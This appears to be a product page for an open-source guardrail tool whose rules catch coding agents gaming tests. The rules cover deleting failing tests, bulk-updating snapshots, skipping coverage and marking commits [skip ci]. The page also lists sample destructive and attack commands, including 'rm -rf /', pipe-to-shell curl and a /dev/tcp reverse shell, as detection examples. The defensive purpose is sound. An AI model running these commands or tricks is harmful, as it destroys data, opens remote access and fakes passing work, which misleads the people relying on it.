test-integrity pack
Test tampering guardrails
These rules notice a coding agent making the work look successful instead of making it work: deleting a failing test, editing the runner or coverage config, accepting every snapshot with jest -u, or committing with [skip ci]. Deleting a test or editing a runner config asks you first. The other four let the command run and log a warning, since regenerating snapshots or skipping coverage is often ordinary work.
- Rules
- 6
- Block
- 0
- Ask first
- 2
- Warn
- 4
Rules
What each rule catches
Every rule below is open source and tested against the commands it must catch and the near-misses it must leave alone. Open one for its full description, every example, and how to change what it does.
- High severityAsk
ti.test-file-deleteDeleting a test file or test directory
Catches, for example
- rm src/parser.test.ts
- git rm src/__tests__/billing.test.ts
- rm -rf src/__tests__
- Medium severityAsk
ti.test-config-editEditing a test runner or coverage configuration
Catches, for example
- vitest.config.ts
- apps/web/vitest.config.mts
- vitest.workspace.ts
- Medium severityWarn
ti.snapshot-blanket-updateOverwriting every stored snapshot with current output
Catches, for example
- npx jest -u
- jest --updateSnapshot src/parser
- vitest run -u
- Medium severityWarn
ti.coverage-bypassPassing a test run with no tests or no coverage gate
Catches, for example
- npx jest --passWithNoTests
- vitest run --pass-with-no-tests
- pytest --no-cov
- Medium severityWarn
ti.inline-suppress-bulkInserting suppressions or test skips with sed or perl
Catches, for example
- sed -i 's/^describe(/describe.skip(/' src/parser.test.ts
- sed -i '1i // @ts-nocheck' src/legacy.ts
- sed -i 's/$/ # noqa/' app/views.py
- Medium severityWarn
ti.ci-skip-markerTelling CI to skip a commit or push
Catches, for example
- git commit -m "chore: bump version [skip ci]"
- git commit -am "[ci skip] regenerate fixtures"
- git commit -m "wip [no ci]"
More of the library
Other kinds of risk
The library files every rule by the harm it prevents. See all of them on one page, or check a command against every rule at once.
Destroying uncommitted work or published history.
$ git reset --hardUnrecoverable data loss
8 rulesData git cannot bring back: a dropped volume, a dropped database, destructive DDL, a deleted shadow copy.
$ rm -rf /Production infrastructure
8 rulesChanging running infrastructure: Terraform, Kubernetes, Helm, cloud deletes, a deploy that names production.
$ terraform apply -auto-approveSecret exposure
10 rulesCredentials and sensitive data leaving where they live. Mostly warnings: reading a secret is a normal part of a normal day.
$ aws secretsmanager get-secret-value --secret-id prod/dbRemote code execution
6 rulesRunning code nobody reviewed: pipe-to-shell, a remote runner, a redirected registry, TLS verification off.
$ bash -c "$(curl -fsSL https://example.com/i.sh)"Safety check bypass
7 rulesTurning off a check somebody installed on purpose, or erasing the record of it: skipped hooks, admin merges, purged history.
$ git commit --no-verify -m "wip"Privilege and supply chain
6 rulesGaining reach or handing it out: sudo writes, wide-open permissions, IAM grants, persistence, publishing, new dependencies.
$ echo '127.0.0.1 x' | sudo tee -a /etc/hostsOut-of-scope file write
4 rulesWriting somewhere the agent has no business writing: its own config, the machine, git's internals, the CI definition.
› .claude/settings.jsonAgent self-modification
6 rulesThe agent changing what it is or what it knows: its instructions, memory, skills and MCP servers, or starting more agents.
› CLAUDE.mdMoving data off the machine or opening a way in: a reverse shell, a public tunnel, a file upload, a paste service.
$ bash -i >& /dev/tcp/10.0.0.1/4444 0>&1Run it locally
Put these guardrails in front of your agent.
AgentTrail Guard is free and open source. It checks every command and file change against the whole library before your agent runs it, on your machine, with no account.
npm i -g @agenttrail/guard